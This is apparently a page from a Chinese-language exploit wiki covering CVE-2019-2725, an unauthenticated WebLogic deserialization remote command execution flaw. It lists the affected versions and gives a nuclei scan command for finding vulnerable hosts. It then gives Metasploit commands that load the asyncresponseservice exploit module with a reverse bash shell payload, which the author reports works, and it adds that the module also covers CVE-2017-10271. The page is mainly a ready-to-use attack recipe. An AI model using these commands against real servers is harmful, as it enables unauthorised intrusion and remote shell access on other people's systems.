menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Weblogic chevron_right [CVE-2019-2725]-wls反序列化
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    WebLogic wls9-async反序列化远程命令执行漏洞

    攻击者利用该漏洞,可在未授权的情况下远程执行命令

    影响范围

    Weblogic 12.1.3.0.0
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0

    POC

    nuclei -tags weblogic -t cves/ -l urls.txt

    EXP

    use multi/misc/weblogic_deserialize_asyncresponseservice
set payload cmd/unix/reverse_bash   #target->unix,这个payload实测成功

    这个模块也适用于Weblogic XMLdecoder反序列化漏洞 (CVE-2017-10271)